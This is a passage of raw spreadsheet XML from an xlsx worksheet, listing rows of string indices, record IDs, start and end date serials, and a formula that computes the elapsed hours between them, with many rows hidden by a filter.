      <c r="C499" t="s">
        <v>1883</v>
      </c>
      <c r="D499" t="s">
        <v>7</v>
      </c>
      <c r="E499" s="1">
        <v>43579.372499999998</v>
      </c>
      <c r="F499" s="1">
        <v>43601.232719907406</v>
      </c>
      <c r="G499" t="s">
        <v>75</v>
      </c>
      <c r="H499" t="str">
        <f>TEXT(F499-E499,"[h]")</f>
        <v>524</v>
      </c>
    </row>
    <row r="500" spans="1:8" hidden="1">
      <c r="A500" t="s">
        <v>1884</v>
      </c>
      <c r="B500">
        <v>13396</v>
      </c>
      <c r="C500" t="s">
        <v>1885</v>
      </c>
      <c r="D500" t="s">
        <v>7</v>
      </c>
      <c r="E500" s="1">
        <v>43579.2112037037</v>
      </c>
      <c r="F500" s="1">
        <v>43582.037569444445</v>
      </c>
      <c r="G500" t="s">
        <v>1886</v>
      </c>
      <c r="H500" t="str">
        <f>TEXT(F500-E500,"[h]")</f>
        <v>67</v>
      </c>
    </row>
    <row r="501" spans="1:8" hidden="1">
      <c r="A501" t="s">
        <v>1887</v>
      </c>
      <c r="B501">
        <v>13395</v>
      </c>
      <c r="C501" t="s">
        <v>1888</v>
      </c>
      <c r="D501" t="s">
        <v>7</v>
      </c>
      <c r="E501" s="1">
        <v>43578.775868055556</v>
      </c>
      <c r="F501" s="1">
        <v>43581.251886574071</v>
      </c>
      <c r="G501" t="s">
        <v>852</v>
      </c>
      <c r="H501" t="str">
        <f>TEXT(F501-E501,"[h]")</f>
        <v>59</v>
      </c>
    </row>
    <row r="502" spans="1:8" hidden="1">
      <c r="A502" t="s">
        <v>1889</v>
      </c>
      <c r="B502">
        <v>13391</v>
      </c>
      <c r="C502" t="s">
        <v>1890</v>
      </c>
      <c r="D502" t="s">
        <v>7</v>
      </c>
      <c r="E502" s="1">
        <v>43578.450092592589</v>
      </c>
      <c r="F502" s="1">
        <v>43578.675370370373</v>
      </c>
      <c r="G502" t="s">
        <v>1891</v>
      </c>
      <c r="H502" t="str">
        <f>TEXT(F502-E502,"[h]")</f>
        <v>5</v>
      </c>
    </row>
    <row r="503" spans="1:8" hidden="1">
      <c r="A503" t="s">
        <v>1894</v>
      </c>
      <c r="B503">
        <v>13390</v>
      </c>
      <c r="C503" t="s">
        <v>1895</v>
      </c>
      <c r="D503" t="s">
        <v>7</v>
      </c>
      <c r="E503" s="1">
        <v>43578.372615740744</v>
      </c>
      <c r="F503" s="1">
        <v>43581.240902777776</v>
      </c>
      <c r="G503" t="s">
        <v>258</v>
      </c>
      <c r="H503" t="str">
        <f>TEXT(F503-E503,"[h]")</f>
        <v>68</v>
      </c>
    </row>
    <row r="504" spans="1:8" hidden="1">
      <c r="A504" t="s">
        <v>1896</v>
      </c>
      <c r="B504">
        <v>13389</v>
      </c>
      <c r="C504" t="s">
        <v>1897</v>
      </c>
      <c r="D504" t="s">
        <v>7</v>
      </c>
      <c r="E504" s="1">
        <v>43578.192916666667</v>
      </c>
      <c r="F504" s="1">
        <v>43603.744537037041</v>
      </c>
      <c r="G504" t="s">
        <v>1898</v>
      </c>
      <c r="H504" t="str">
        <f>TEXT(F504-E504,"[h]")</f>
        <v>613</v>
      </c>
    </row>
    <row r="505" spans="1:8">
      <c r="A505" t="s">
        <v>1892</v>
      </c>
      <c r="B505">
        <v>13388</v>
      </c>
      <c r="C505" t="s">
        <v>1893</v>
      </c>
      <c r="D505" t="s">
        <v>7</v>
      </c>
      <c r="E505" s="1">
        <v>43577.996944444443</v>
      </c>
      <c r="F505" s="1">
        <v>43578.270243055558</v>
      </c>
      <c r="G505" t="s">
        <v>16</v>
      </c>
      <c r="H505" t="str">
        <f>TEXT(F505-E505,"[h]")</f>
        <v>6</v>
      </c>
    </row>
    <row r="506" spans="1:8" hidden="1">
      <c r="A506" t="s">
        <v>1899</v>
      </c>
      <c r="B506">
        <v>13386</v>
      </c>
      <c r="C506" t="s">
        <v>1900</v>
      </c>
      <c r="D506" t="s">
        <v>7</v>
      </c>
      <c r="E506" s="1">
        <v>43577.52925925926</v>
      </c>
      <c r="F506" s="1">
        <v>43622.219467592593</v>
      </c>
      <c r="G506" t="s">
        <v>301</v>
      </c>
      <c r="H506" t="str">
        <f>TEXT(F506-E506,"[h]")</f>
        <v>1072</v>
      </c>
    </row>
    <row r="507" spans="1:8">
      <c r="A507" t="s">
        <v>1901</v>
      </c>
      <c r="B507">
        <v>13384</v>
      </c>
      <c r="C507" t="s">
        <v>1902</v>
      </c>
      <c r="D507" t="s">
        <v>7</v>
      </c>
      <c r="E507" s="1">
        <v>43577.265335648146</v>
      </c>
      <c r="F507" s="1">
        <v>43578.270231481481</v>
      </c>
      <c r="G507" t="s">
        <v>1086</v>
      </c>
      <c r="H507" t="str">
        <f>TEXT(F507-E507,"[h]")</f>
        <v>24</v>
      </c>
    </row>
    <row r="508" spans="1:8" hidden="1">
      <c r="A508" t="s">
        <v>1903</v>
      </c>
      <c r="B508">
        <v>13383</v>
      </c>
      <c r="C508" t="s">
        <v>1904</v>
      </c>
      <c r="D508" t="s">
        <v>7</v>
      </c>
      <c r="E508" s="1">
        <v>43577.120474537034</v>
      </c>
      <c r="F508" s="1">
        <v>43577.530266203707</v>
      </c>
      <c r="G508" t="s">
        <v>90</v>
      </c>
      <c r="H508" t="str">
        <f>TEXT(F508-E508,"[h]")</f>
        <v>9</v>
      </c>
    </row>
    <row r="509" spans="1:8" hidden="1">
      <c r="A509" t="s">
        <v>1905</v>
      </c>
      <c r="B509">
        <v>13382</v>
      </c>
      <c r="C509" t="s">
        <v>1906</v>
      </c>
      <c r="D509" t="s">
        <v>7</v>
      </c>
      <c r="E509" s="1">
        <v>43576.809930555559</v>
      </c>
      <c r="F509" s="1">
        <v>43576.865844907406</v>
      </c>
      <c r="G509" t="s">
        <v>859</v>
      </c>
      <c r="H509" t="str">
        <f>TEXT(F509-E509,"[h]")</f>
        <v>1</v>
      </c>
    </row>
    <row r="510" spans="1:8">
      <c r="A510" t="s">
        <v>1907</v>
      </c>
      <c r="B510">
        <v>13379</v>
      </c>
      <c r="C510" t="s">
        <v>1908</v>
      </c>
      <c r="D510" t="s">
        <v>7</v>
      </c>
      <c r="E510" s="1">
        <v>43576.693888888891</v>
      </c>
      <c r="F510" s="1">
        <v>43576.753275462965</v>
      </c>
      <c r="G510" t="s">
        <v>160</v>
      </c>
      <c r="H510" t="str">
        <f>TEXT(F510-E510,"[h]")</f>
        <v>1</v>
      </c>
    </row>
    <row r="511" spans="1:8" hidden="1">
      <c r="A511" t="s">
        <v>1909</v>
      </c>
      <c r="B511">
        <v>13377</v>
      </c>
      <c r="C511" t="s">
        <v>1910</v>
      </c>
      <c r="D511" t="s">
        <v>7</v>
      </c>
      <c r="E511" s="1">
        <v>43576.457060185188</v>
      </c>
      <c r="F511" s="1">
        <v>43613.388749999998</v>
      </c>
      <c r="G511" t="s">
        <v>51</v>
      </c>
      <c r="H511" t="str">
        <f>TEXT(F511-E511,"[h]")</f>
        <v>886</v>
      </c>
    </row>
    <row r="512" spans="1:8">
      <c r="A512" t="s">
        <v>1911</v>
      </c>
      <c r="B512">
        <v>13376</v>
      </c>
      <c r="C512" t="s">
        <v>1912</v>
      </c>
      <c r="D512" t="s">
        <v>7</v>
      </c>
      <c r="E512" s="1">
        <v>43576.436759259261</v>
      </c>
      <c r="F512" s="1">
        <v>43582.560949074075</v>
      </c>
      <c r="G512" t="s">
        <v>25</v>
      </c>
      <c r="H512" t="str">
        <f>TEXT(F512-E512,"[h]")</f>
        <v>146</v>
      </c>
    </row>
    <row r="513" spans="1:8" hidden="1">
      <c r="A513" t="s">
        <v>1913</v>
      </c>
      <c r="B513">
        <v>13374</v>
      </c>
      <c r="C513" t="s">
        <v>1914</v>
      </c>
      <c r="D513" t="s">
        <v>7</v>
      </c>
      <c r="E513" s="1">
        <v>43575.660914351851</v>
      </c>
      <c r="F513" s="1">
        <v>43575.82708333333</v>
      </c>
      <c r="G513" t="s">
        <v>66</v>
      </c>
      <c r="H513" t="str">
        <f>TEXT(F513-E513,"[h]")</f>
        <v>3</v>
      </c>
    </row>
    <row r="514" spans="1:8" hidden="1">
      <c r="A514" t="s">
        <v>1915</v>
      </c>
      <c r="B514">
        <v>13371</v>
      </c>
      <c r="C514" t="s">
        <v>1916</v>
      </c>
      <c r="D514" t="s">
        <v>7</v>
      </c>
      <c r="E514" s="1">
        <v>43575.054803240739</v>
      </c>
      <c r="F514" s="1">
        <v>43578.045057870368</v>
      </c>
      <c r="G514" t="s">
        <v>1917</v>
      </c>
      <c r="H514" t="str">
        <f>TEXT(F514-E514,"[h]")</f>
        <v>71</v>
      </c>
    </row>
    <row r="515" spans="1:8" hidden="1">
      <c r="B515">
        <v>13370</v>
      </c>
      <c r="C515" t="s">
        <v>1918</v>
      </c>
      <c r="D515" t="s">
        <v>7</v>
      </c>
      <c r="E515" s="1">
        <v>43575.030023148145</v>
      </c>
      <c r="F515" s="1">
        <v>43578.045057870368</v>
      </c>
      <c r="G515" t="s">
        <v>1919</v>
      </c>
      <c r="H515" t="str">
        <f>TEXT(F515-E515,"[h]")</f>
        <v>72</v>
      </c>
    </row>
    <row r="516" spans="1:8" hidden="1">
      <c r="A516" t="s">
        <v>1920</v>
      </c>
      <c r="B516">
        <v>13368</v>
      </c>
      <c r="C516" t="s">
        <v>1921</v>
      </c>
      <c r="D516" t="s">
        <v>7</v>
      </c>
      <c r="E516" s="1">
        <v>43574.71366898148</v>
      </c>
      <c r="F516" s="1">
        <v>43695.127824074072</v>
      </c>
      <c r="G516" t="s">
        <v>461</v>
      </c>
      <c r="H516" t="str">
        <f>TEXT(F516-E516,"[h]")</f>
        <v>2889</v>
      </c>
    </row>
    <row r="517" spans="1:8" hidden="1">
      <c r="A517" t="s">
        <v>1922</v>
      </c>
      <c r="B517">
        <v>13367</v>
      </c>
      <c r="C517" t="s">
        <v>1923</v>
      </c>
      <c r="D517" t="s">
        <v>7</v>
      </c>
      <c r="E517" s="1">
        <v>43574.558356481481</v>
      </c>
      <c r="F517" s="1">
        <v>43578.864259259259</v>
      </c>
      <c r="G517" t="s">
        <v>66</v>
      </c>
      <c r="H517" t="str">
        <f>TEXT(F517-E517,"[h]")</f>
        <v>103</v>
      </c>
    </row>
    <row r="518" spans="1:8" hidden="1">
      <c r="A518" t="s">
        <v>1926</v>
      </c>
      <c r="B518">
        <v>13362</v>
      </c>
      <c r="C518" t="s">
        <v>1927</v>
      </c>
      <c r="D518" t="s">
        <v>7</v>
      </c>
      <c r="E518" s="1">
        <v>43572.825370370374</v>
      </c>
      <c r="F518" s="1">
        <v>43604.416203703702</v>
      </c>
      <c r="G518" t="s">
        <v>118</v>
      </c>
      <c r="H518" t="str">
        <f>TEXT(F518-E518,"[h]")</f>
        <v>758</v>
      </c>
    </row>
    <row r="519" spans="1:8">
      <c r="A519" t="s">
        <v>1928</v>
      </c>
      <c r="B519">
        <v>13361</v>
      </c>
      <c r="C519" t="s">
        <v>1929</v>
      </c>
      <c r="D519" t="s">
        <v>7</v>
      </c>
      <c r="E519" s="1">
        <v>43572.817835648151</v>
      </c>
      <c r="F519" s="1">
        <v>43600.650405092594</v>
      </c>
      <c r="G519" t="s">
        <v>1930</v>
      </c>
      <c r="H519" t="str">
        <f>TEXT(F519-E519,"[h]")</f>
        <v>667</v>
      </c>
    </row>
    <row r="520" spans="1:8" hidden="1">
      <c r="A520" t="s">
        <v>1931</v>
      </c>
      <c r="B520">
        <v>13360</v>
      </c>
      <c r="C520" t="s">
        <v>1932</v>
      </c>
      <c r="D520" t="s">
        <v>7</v>
      </c>
      <c r="E520" s="1">
        <v>43572.787314814814</v>
      </c>
      <c r="F520" s="1">
        <v>43572.859513888892</v>
      </c>
      <c r="G520" t="s">
        <v>1933</v>
      </c>
      <c r="H520" t="str">
        <f>TEXT(F520-E520,"[h]")</f>
        <v>1</v>
      </c>
    </row>
    <row r="521" spans="1:8" hidden="1">
      <c r="A521" t="s">
        <v>1934</v>
      </c>
      <c r="B521">
        <v>13359</v>
      </c>
      <c r="C521" t="s">
        <v>1935</v>
      </c>
      <c r="D521" t="s">
        <v>7</v>
      </c>
      <c r="E521" s="1">
        <v>43572.566516203704</v>
      </c>
      <c r="F521" s="1">
        <v>43572.762303240743</v>
      </c>
      <c r="G521" t="s">
        <v>1936</v>
      </c>
      <c r="H521" t="str">
        <f>TEXT(F521-E521,"[h]")</f>
        <v>4</v>
      </c>
    </row>
    <row r="522" spans="1:8" hidden="1">
      <c r="A522" t="s">
        <v>1937</v>
      </c>
      <c r="B522">
        <v>13354</v>
      </c>
      <c r="C522" t="s">
        <v>1938</v>
      </c>
      <c r="D522" t="s">
        <v>7</v>
      </c>
      <c r="E522" s="1">
        <v>43572.132071759261</v>
      </c>
      <c r="F522" s="1">
        <v>43573.49318287037</v>
      </c>
      <c r="G522" t="s">
        <v>1939</v>
      </c>
      <c r="H522" t="str">
        <f>TEXT(F522-E522,"[h]")</f>
        <v>32</v>
      </c>
    </row>
    <row r="523" spans="1:8" hidden="1">
      <c r="A523" t="s">
        <v>1940</v>
      </c>
      <c r="B523">
        <v>13353</v>
      </c>
      <c r="C523" t="s">
        <v>1941</v>
      </c>
      <c r="D523" t="s">
        <v>7</v>
      </c>
      <c r="E523" s="1">
        <v>43572.044733796298</v>
      </c>
      <c r="F523" s="1">
        <v>43730.735312500001</v>
      </c>
      <c r="G523" t="s">
        <v>66</v>
      </c>
      <c r="H523" t="str">
        <f>TEXT(F523-E523,"[h]")</f>
        <v>3808</v>
      </c>
    </row>
    <row r="524" spans="1:8" hidden="1">
      <c r="A524" t="s">
        <v>1942</v>
      </c>
      <c r="B524">
        <v>13352</v>
      </c>
      <c r="C524" t="s">
        <v>1943</v>
      </c>
      <c r="D524" t="s">
        <v>7</v>
      </c>
      <c r="E524" s="1">
        <v>43571.813888888886</v>
      </c>
      <c r="F524" s="1">
        <v>43685.571875000001</v>
      </c>
      <c r="G524" t="s">
        <v>1230</v>
      </c>
      <c r="H524" t="str">
        <f>TEXT(F524-E524,"[h]")</f>
        <v>2730</v>
      </c>
    </row>
    <row r="525" spans="1:8">
      <c r="A525" t="s">
        <v>1944</v>
      </c>
      <c r="B525">
        <v>13348</v>
      </c>
      <c r="C525" t="s">
        <v>1945</v>
      </c>
      <c r="D525" t="s">
        <v>7</v>
      </c>
      <c r="E525" s="1">
        <v>43571.354768518519</v>
      </c>
      <c r="F525" s="1">
        <v>43571.618055555555</v>
      </c>
      <c r="G525" t="s">
        <v>123</v>
      </c>
      <c r="H525" t="str">
        <f>TEXT(F525-E525,"[h]")</f>
        <v>6</v>
      </c>
    </row>
    <row r="526" spans="1:8">
      <c r="A526" t="s">
        <v>1946</v>
      </c>
      <c r="B526">
        <v>13347</v>
      </c>
      <c r="C526" t="s">
        <v>1947</v>
      </c>
      <c r="D526" t="s">
        <v>7</v>
      </c>
      <c r="E526" s="1">
        <v>43571.348425925928</v>
      </c>
      <c r="F526" s="1">
        <v>43571.618055555555</v>
      </c>
      <c r="G526" t="s">
        <v>22</v>
      </c>
      <c r="H526" t="str">
        <f>TEXT(F526-E526,"[h]")</f>
        <v>6</v>
      </c>
    </row>
    <row r="527" spans="1:8">
      <c r="A527" t="s">
        <v>1924</v>
      </c>
      <c r="B527">
        <v>13346</v>
      </c>
      <c r="C527" t="s">
        <v>1925</v>
      </c>
      <c r="D527" t="s">
        <v>7</v>
      </c>
      <c r="E527" s="1">
        <v>43571.323622685188</v>
      </c>
      <c r="F527" s="1">
        <v>43571.666932870372</v>
      </c>
      <c r="G527" t="s">
        <v>13</v>
      </c>
      <c r="H527" t="str">
        <f>TEXT(F527-E527,"[h]")</f>
        <v>8</v>
      </c>
    </row>
    <row r="528" spans="1:8" hidden="1">
      <c r="A528" t="s">
        <v>1772</v>
      </c>
      <c r="B528">
        <v>13344</v>
      </c>
      <c r="C528" t="s">
        <v>1948</v>
      </c>
      <c r="D528" t="s">
        <v>7</v>
      </c>
      <c r="E528" s="1">
        <v>43571.217303240737</v>
      </c>
      <c r="F528" s="1">
        <v>43571.811493055553</v>
      </c>
      <c r="G528" t="s">
        <v>1721</v>
      </c>
      <c r="H528" t="str">
        <f>TEXT(F528-E528,"[h]")</f>
        <v>14</v>
      </c>
    </row>
    <row r="529" spans="1:8">
      <c r="A529" t="s">
        <v>1956</v>
      </c>
      <c r="B529">
        <v>13339</v>
      </c>
      <c r="C529" t="s">
        <v>1957</v>
      </c>
      <c r="D529" t="s">
        <v>7</v>
      </c>
      <c r="E529" s="1">
        <v>43571.064652777779</v>
      </c>
      <c r="F529" s="1">
        <v>43571.136354166665</v>
      </c>
      <c r="G529" t="s">
        <v>1958</v>
      </c>
      <c r="H529" t="str">
        <f>TEXT(F529-E529,"[h]")</f>
        <v>1</v>
      </c>
    </row>
    <row r="530" spans="1:8" hidden="1">
      <c r="A530" t="s">
        <v>1959</v>
      </c>
      <c r="B530">
        <v>13337</v>
      </c>
      <c r="C530" t="s">
        <v>1960</v>
      </c>
      <c r="D530" t="s">
        <v>7</v>
      </c>
      <c r="E530" s="1">
        <v>43570.594988425924</v>
      </c>
      <c r="F530" s="1">
        <v>43571.682337962964</v>
      </c>
      <c r="G530" t="s">
        <v>66</v>
      </c>
      <c r="H530" t="str">
        <f>TEXT(F530-E530,"[h]")</f>
        <v>26</v>
      </c>
    </row>
    <row r="531" spans="1:8" hidden="1">
      <c r="A531" t="s">
        <v>1961</v>
      </c>
      <c r="B531">
        <v>13336</v>
      </c>
      <c r="C531" t="s">
        <v>1962</v>
      </c>
      <c r="D531" t="s">
        <v>7</v>
      </c>
      <c r="E531" s="1">
        <v>43570.466134259259</v>
      </c>
      <c r="F531" s="1">
        <v>43586.796261574076</v>
      </c>
      <c r="G531" t="s">
        <v>1520</v>
      </c>
      <c r="H531" t="str">
        <f>TEXT(F531-E531,"[h]")</f>
        <v>391</v>
      </c>
    </row>
    <row r="532" spans="1:8" hidden="1">
      <c r="A532" t="s">
        <v>1949</v>
      </c>
      <c r="B532">
        <v>13335</v>
      </c>
      <c r="C532" t="s">
        <v>1950</v>
      </c>
      <c r="D532" t="s">
        <v>7</v>
      </c>
      <c r="E532" s="1">
        <v>43570.297523148147</v>
      </c>
      <c r="F532" s="1">
        <v>43570.745752314811</v>
      </c>
      <c r="G532" t="s">
        <v>66</v>
      </c>
      <c r="H532" t="str">
        <f>TEXT(F532-E532,"[h]")</f>
        <v>10</v>
      </c>
    </row>
    <row r="533" spans="1:8">
      <c r="A533" t="s">
        <v>1963</v>
      </c>
      <c r="B533">
        <v>13334</v>
      </c>
      <c r="C533" t="s">
        <v>1964</v>
      </c>
      <c r="D533" t="s">
        <v>7</v>
      </c>
      <c r="E533" s="1">
        <v>43570.102743055555</v>
      </c>
      <c r="F533" s="1">
        <v>43580.964594907404</v>
      </c>
      <c r="G533" t="s">
        <v>31</v>
      </c>
      <c r="H533" t="str">
        <f>TEXT(F533-E533,"[h]")</f>
        <v>260</v>
      </c>
    </row>
    <row r="534" spans="1:8">
      <c r="A534" t="s">
        <v>1694</v>
      </c>
      <c r="B534">
        <v>13332</v>
      </c>
      <c r="C534" t="s">
        <v>1695</v>
      </c>
      <c r="D534" t="s">
        <v>7</v>
      </c>
      <c r="E534" s="1">
        <v>43569.968564814815</v>
      </c>
      <c r="F534" s="1">
        <v>43596.714016203703</v>
      </c>
      <c r="G534" t="s">
        <v>31</v>
      </c>
      <c r="H534" t="str">
        <f>TEXT(F534-E534,"[h]")</f>
        <v>641</v>
      </c>
    </row>
    <row r="535" spans="1:8" hidden="1">
      <c r="A535" t="s">
        <v>1965</v>
      </c>
      <c r="B535">
        <v>13331</v>
      </c>
      <c r="C535" t="s">
        <v>1966</v>
      </c>
      <c r="D535" t="s">
        <v>7</v>
      </c>
      <c r="E535" s="1">
        <v>43569.890138888892</v>
      </c>
      <c r="F535" s="1">
        <v>43570.753668981481</v>
      </c>
      <c r="G535" t="s">
        <v>90</v>
      </c>
      <c r="H535" t="str">
        <f>TEXT(F535-E535,"[h]")</f>
        <v>20</v>
      </c>
    </row>
    <row r="536" spans="1:8" hidden="1">
      <c r="A536" t="s">
        <v>1967</v>
      </c>
      <c r="B536">
        <v>13329</v>
      </c>
      <c r="C536" t="s">
        <v>1968</v>
      </c>
      <c r="D536" t="s">
        <v>7</v>
      </c>
      <c r="E536" s="1">
        <v>43569.849675925929</v>
      </c>
      <c r="F536" s="1">
        <v>43605.69258101852</v>
      </c>
      <c r="G536" t="s">
        <v>1969</v>
      </c>
      <c r="H536" t="str">
        <f>TEXT(F536-E536,"[h]")</f>
        <v>860</v>
      </c>
    </row>
    <row r="537" spans="1:8" hidden="1">
      <c r="A537" t="s">
        <v>1970</v>
      </c>
      <c r="B537">
        <v>13328</v>
      </c>
      <c r="C537" t="s">
        <v>1971</v>
      </c>
      <c r="D537" t="s">
        <v>7</v>
      </c>
      <c r="E537" s="1">
        <v>43569.805509259262</v>
      </c>
      <c r="F537" s="1">
        <v>43569.881574074076</v>
      </c>
      <c r="G537" t="s">
        <v>883</v>
      </c>
      <c r="H537" t="str">
        <f>TEXT(F537-E537,"[h]")</f>
        <v>1</v>
      </c>
    </row>
    <row r="538" spans="1:8">
      <c r="A538" t="s">
        <v>1972</v>
      </c>
      <c r="B538">
        <v>13327</v>
      </c>
      <c r="C538" t="s">
        <v>1973</v>
      </c>
      <c r="D538" t="s">
        <v>7</v>
      </c>
      <c r="E538" s="1">
        <v>43569.781990740739</v>
      </c>
      <c r="F538" s="1">
        <v>43569.785555555558</v>
      </c>
      <c r="G538" t="s">
        <v>25</v>
      </c>
      <c r="H538" t="str">
        <f>TEXT(F538-E538,"[h]")</f>
        <v>0</v>
      </c>
    </row>
    <row r="539" spans="1:8" hidden="1">
      <c r="A539" t="s">
        <v>1974</v>
      </c>
      <c r="B539">
        <v>13326</v>
      </c>
      <c r="C539" t="s">
        <v>1975</v>
      </c>
      <c r="D539" t="s">
        <v>7</v>
      </c>
      <c r="E539" s="1">
        <v>43569.552141203705</v>
      </c>
      <c r="F539" s="1">
        <v>43611.709131944444</v>
      </c>
      <c r="G539" t="s">
        <v>536</v>
      </c>
      <c r="H539" t="str">
        <f>TEXT(F539-E539,"[h]")</f>
        <v>1011</v>
      </c>
    </row>
    <row r="540" spans="1:8" hidden="1">
      <c r="A540" t="s">
        <v>1976</v>
      </c>
      <c r="B540">
        <v>13324</v>
      </c>
      <c r="C540" t="s">
        <v>1977</v>
      </c>
      <c r="D540" t="s">
        <v>7</v>
      </c>
      <c r="E540" s="1">
        <v>43569.010949074072</v>
      </c>
      <c r="F540" s="1">
        <v>43569.066527777781</v>
      </c>
      <c r="G540" t="s">
        <v>28</v>
      </c>
      <c r="H540" t="str">
        <f>TEXT(F540-E540,"[h]")</f>
        <v>1</v>
      </c>
    </row>
    <row r="541" spans="1:8">
      <c r="A541" t="s">
        <v>1951</v>
      </c>
      <c r="B541">
        <v>13323</v>
      </c>
      <c r="C541" t="s">
        <v>1952</v>
      </c>
      <c r="D541" t="s">
        <v>7</v>
      </c>
      <c r="E541" s="1">
        <v>43568.843611111108</v>
      </c>
      <c r="F541" s="1">
        <v>43568.880509259259</v>
      </c>
      <c r="G541" t="s">
        <v>1953</v>
      </c>
      <c r="H541" t="str">
        <f>TEXT(F541-E541,"[h]")</f>
        <v>0</v>
      </c>
    </row>
    <row r="542" spans="1:8" hidden="1">
      <c r="A542" t="s">
        <v>1978</v>
      </c>
      <c r="B542">
        <v>13322</v>
      </c>
      <c r="C542" t="s">
        <v>1979</v>
      </c>
      <c r="D542" t="s">
        <v>7</v>
      </c>
      <c r="E542" s="1">
        <v>43568.838888888888</v>
      </c>
      <c r="F542" s="1">
        <v>43569.117395833331</v>
      </c>
      <c r="G542" t="s">
        <v>1980</v>
      </c>
      <c r="H542" t="str">
        <f>TEXT(F542-E542,"[h]")</f>
        <v>6</v>
      </c>
    </row>
    <row r="543" spans="1:8" hidden="1">
      <c r="A543" t="s">
        <v>1772</v>
      </c>
      <c r="B543">
        <v>13321</v>
      </c>
      <c r="C543" t="s">
        <v>1981</v>
      </c>
      <c r="D543" t="s">
        <v>7</v>
      </c>
      <c r="E543" s="1">
        <v>43568.789537037039</v>
      </c>
      <c r="F543" s="1">
        <v>43568.836284722223</v>
      </c>
      <c r="G543" t="s">
        <v>28</v>
      </c>
      <c r="H543" t="str">
        <f>TEXT(F543-E543,"[h]")</f>
        <v>1</v>
      </c>
    </row>
    <row r="544" spans="1:8" hidden="1">
      <c r="A544" t="s">
        <v>1982</v>
      </c>
      <c r="B544">
        <v>13320</v>
      </c>
      <c r="C544" t="s">
        <v>1983</v>
      </c>
      <c r="D544" t="s">
        <v>7</v>
      </c>
      <c r="E544" s="1">
        <v>43568.729039351849</v>
      </c>
      <c r="F544" s="1">
        <v>43568.817685185182</v>
      </c>
      <c r="G544" t="s">
        <v>60</v>
      </c>
      <c r="H544" t="str">
        <f>TEXT(F544-E544,"[h]")</f>
        <v>2</v>
      </c>
    </row>
    <row r="545" spans="1:8" hidden="1">
      <c r="A545" t="s">
        <v>1984</v>
      </c>
      <c r="B545">
        <v>13318</v>
      </c>
      <c r="C545" t="s">
        <v>1985</v>
      </c>
      <c r="D545" t="s">
        <v>7</v>
      </c>
      <c r="E545" s="1">
        <v>43567.892488425925</v>
      </c>
      <c r="F545" s="1">
        <v>43570.790081018517</v>
      </c>
      <c r="G545" t="s">
        <v>1986</v>
      </c>
      <c r="H545" t="str">
        <f>TEXT(F545-E545,"[h]")</f>
        <v>69</v>
      </c>
    </row>
    <row r="546" spans="1:8" hidden="1">
      <c r="A546" t="s">
        <v>1987</v>
      </c>
      <c r="B546">
        <v>13316</v>
      </c>
      <c r="C546" t="s">
        <v>1988</v>
      </c>
      <c r="D546" t="s">
        <v>7</v>
      </c>
      <c r="E546" s="1">
        <v>43567.657997685186</v>
      </c>
      <c r="F546" s="1">
        <v>43570.324016203704</v>
      </c>
      <c r="G546" t="s">
        <v>66</v>
      </c>
      <c r="H546" t="str">
        <f>TEXT(F546-E546,"[h]")</f>
        <v>63</v>
      </c>
    </row>
    <row r="547" spans="1:8" hidden="1">
      <c r="A547" t="s">
        <v>1989</v>
      </c>
      <c r="B547">
        <v>13315</v>
      </c>
      <c r="C547" t="s">
        <v>1990</v>
      </c>
      <c r="D547" t="s">
        <v>7</v>
      </c>
      <c r="E547" s="1">
        <v>43567.539618055554</v>
      </c>
      <c r="F547" s="1">
        <v>43568.817685185182</v>
      </c>
      <c r="G547" t="s">
        <v>301</v>
      </c>
      <c r="H547" t="str">
        <f>TEXT(F547-E547,"[h]")</f>
        <v>30</v>
      </c>
    </row>
    <row r="548" spans="1:8" hidden="1">
      <c r="A548" t="s">
        <v>1991</v>
      </c>
      <c r="B548">
        <v>13314</v>
      </c>
      <c r="C548" t="s">
        <v>1992</v>
      </c>
      <c r="D548" t="s">
        <v>7</v>
      </c>
      <c r="E548" s="1">
        <v>43567.419710648152</v>
      </c>
      <c r="F548" s="1">
        <v>43567.442569444444</v>
      </c>
      <c r="G548" t="s">
        <v>66</v>
      </c>
      <c r="H548" t="str">
        <f>TEXT(F548-E548,"[h]")</f>
        <v>0</v>
      </c>
    </row>
    <row r="549" spans="1:8" hidden="1">
      <c r="A549" t="s">
        <v>1993</v>
      </c>
      <c r="B549">
        <v>13313</v>
      </c>
      <c r="C549" t="s">
        <v>1994</v>
      </c>
      <c r="D549" t="s">
        <v>7</v>
      </c>
      <c r="E549" s="1">
        <v>43567.213854166665</v>
      </c>
      <c r="F549" s="1">
        <v>43567.325196759259</v>
      </c>
      <c r="G549" t="s">
        <v>174</v>
      </c>
      <c r="H549" t="str">
        <f>TEXT(F549-E549,"[h]")</f>
        <v>2</v>
      </c>
    </row>
    <row r="550" spans="1:8">
      <c r="A550" t="s">
        <v>1995</v>
      </c>
      <c r="B550">
        <v>13312</v>
      </c>
      <c r="C550" t="s">
        <v>1996</v>
      </c>
      <c r="D550" t="s">
        <v>7</v>
      </c>
      <c r="E550" s="1">
        <v>43567.200509259259</v>
      </c>
      <c r="F550" s="1">
        <v>43570.746168981481</v>
      </c>
      <c r="G550" t="s">
        <v>31</v>
      </c>
      <c r="H550" t="str">
        <f>TEXT(F550-E550,"[h]")</f>
        <v>85</v>
      </c>
    </row>
    <row r="551" spans="1:8">
      <c r="A551" t="s">
        <v>1997</v>
      </c>
      <c r="B551">
        <v>13311</v>
      </c>
      <c r="C551" t="s">
        <v>1998</v>
      </c>
      <c r="D551" t="s">
        <v>7</v>
      </c>
      <c r="E551" s="1">
        <v>43567.167557870373</v>
      </c>
      <c r="F551" s="1">
        <v>43567.762418981481</v>
      </c>
      <c r="G551" t="s">
        <v>16</v>
      </c>
      <c r="H551" t="str">
        <f>TEXT(F551-E551,"[h]")</f>
        <v>14</v>
      </c>
    </row>
    <row r="552" spans="1:8" hidden="1">
      <c r="A552" t="s">
        <v>1999</v>
      </c>
      <c r="B552">
        <v>13310</v>
      </c>
      <c r="C552" t="s">
        <v>2000</v>
      </c>
      <c r="D552" t="s">
        <v>7</v>
      </c>
      <c r="E552" s="1">
        <v>43567.057326388887</v>
      </c>
      <c r="F552" s="1">
        <v>43567.32912037037</v>
      </c>
      <c r="G552" t="s">
        <v>2001</v>
      </c>
      <c r="H552" t="str">
        <f>TEXT(F552-E552,"[h]")</f>
        <v>6</v>
      </c>
    </row>
    <row r="553" spans="1:8" hidden="1">
      <c r="A553" t="s">
        <v>2002</v>
      </c>
      <c r="B553">
        <v>13309</v>
      </c>
      <c r="C553" t="s">
        <v>2003</v>
      </c>
      <c r="D553" t="s">
        <v>7</v>
      </c>
      <c r="E553" s="1">
        <v>43566.855543981481</v>
      </c>
      <c r="F553" s="1">
        <v>43566.870706018519</v>
      </c>
      <c r="G553" t="s">
